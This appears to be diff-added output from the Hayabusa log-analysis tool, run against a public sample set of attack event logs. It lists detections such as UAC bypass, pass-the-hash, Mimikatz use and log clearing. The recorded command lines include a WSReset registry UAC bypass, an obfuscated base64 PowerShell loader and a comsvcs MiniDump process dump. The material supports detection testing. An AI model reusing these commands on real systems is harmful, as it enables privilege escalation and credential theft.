+2019-08-04 19:16:31.485 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:31.949 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\WSReset.exe""   :  Path: C:\Windows\System32\WSReset.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  56",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:32.001 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 312 000002806444CB40  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:32.438 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\WSReset.exe""   :  Path: C:\Windows\System32\WSReset.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  56",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:32.438 +09:00,MSEDGEWIN10,1,high,UAC Bypass WSReset,,rules/sigma/process_creation/win_uac_bypass_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\WSReset.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,high,Wsreset UAC Bypass,,rules/sigma/process_creation/win_wsreset_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,high,Bypass UAC via WSReset.exe,,rules/sigma/process_creation/win_uac_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:50.455 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:55.299 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:55.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d ""{4ED3A719-CEA8-4BD9-910D-E252F997AFC2}"" /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,informational,Logon Type 9 - NewCredentials,User: IEUser  :  Workstation: -  :  IP Address: ::1  :  Port: 0  :  LogonID: 0x38f87e  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx
+2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx
+2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx
+2019-08-14 20:53:29.688 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\explorer.exe"" shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}  :  Path: C:\Windows\explorer.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
+2019-08-14 20:53:30.010 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding  :  Path: C:\Windows\explorer.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
+2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))""""""  :  Path: C:\Windows\System32\wscript.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
+2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
+2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
+2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
+2019-08-14 21:17:14.614 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}  :  Path: C:\Windows\System32\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
+2019-08-14 21:17:14.614 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
+2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))""""""  :  Path: C:\Windows\System32\wscript.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
+2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
+2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
+2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
+2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
+2019-08-14 21:48:15.921 +09:00,MSEDGEWIN10,4703,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/win10_4703_SeDebugPrivilege_enabled.evtx
+2019-08-14 21:48:15.921 +09:00,MSEDGEWIN10,4703,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/win10_4703_SeDebugPrivilege_enabled.evtx
+2019-08-23 21:37:37.100 +09:00,MSEDGEWIN10,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx
+2019-08-23 21:37:37.100 +09:00,MSEDGEWIN10,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx
+2019-08-23 21:37:38.521 +09:00,MSEDGEWIN10,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx
+2019-08-23 21:37:38.521 +09:00,MSEDGEWIN10,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx
+2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cscript  c:\ProgramData\memdump.vbs notepad.exe  :  Path: C:\Windows\System32\cscript.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
+2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,high,WScript or CScript Dropper,,rules/sigma/process_creation/win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
+2019-08-30 21:54:08.257 +09:00,MSEDGEWIN10,7,informational,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
+2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full  :  Path: C:\Windows\System32\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
+2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
+2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,medium,Process Dump via Comsvcs DLL,,rules/sigma/process_creation/win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
+2019-09-01 20:54:22.450 +09:00,MSEDGEWIN10,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/spoolsample_5145.evtx
+2019-09-03 20:04:07.207 +09:00,MSEDGEWIN10,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
+2019-09-03 20:04:56.358 +09:00,MSEDGEWIN10,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
+2019-09-09 04:17:44.249 +09:00,MSEDGEWIN10,13,low,Usage of Sysinternals Tools,,rules/sigma/registry_event/registry_event_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_valid_account_guest_rid_hijack.evtx
+2019-09-22 20:22:05.201 +09:00,MSEDGEWIN10,4732,high,User added to local Administrators group,User: -  :  SID: S-1-5-21-3461203602-4096304019-2269080069-501  :  Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx
+2019-09-22 20:23:19.251 +09:00,MSEDGEWIN10,4732,high,User added to local Administrators group,User: -  :  SID: S-1-5-20  :  Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx
+2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c set > c:\users\\public\netstat.txt  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\sqlsvc  :  Parent Command: ""c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe"" -sSQLEXPRESS",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx
+2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,critical,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation/win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx
+2019-11-15 17:19:02.298 +09:00,alice.insecurebank.local,1102,high,Security log was cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx
+2019-11-15 17:19:17.134 +09:00,alice.insecurebank.local,4634,informational,Logoff,User: ANONYMOUS LOGON  :  LogonID: 0x1d12916,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx
+2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 url.dll,FileProtocolHandler ms-browser://  :  Path: C:\Windows\System32\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:44:51.016 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""cmd.exe"" /c notepad.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: rundll32 url.dll,FileProtocolHandler ms-browser://",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:44:51.122 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: notepad.exe  :  Path: C:\Windows\System32\notepad.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""cmd.exe"" /c notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 url.dll,OpenURL ms-browser://  :  Path: C:\Windows\System32\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:46:43.819 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""cmd.exe"" /c notepad.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: rundll32 url.dll,OpenURL ms-browser://",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:46:43.836 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: notepad.exe  :  Path: C:\Windows\System32\notepad.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""cmd.exe"" /c notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:48:17.044 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe /c start ms-browser://  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:48:17.044 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:48:17.412 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""cmd.exe"" /c notepad.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd.exe /c start ms-browser://",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:48:17.447 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: notepad.exe  :  Path: C:\Windows\System32\notepad.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""cmd.exe"" /c notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:48:45.243 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: explorer ms-browser://  :  Path: C:\Windows\explorer.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:48:45.243 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:48:45.293 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding  :  Path: C:\Windows\explorer.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
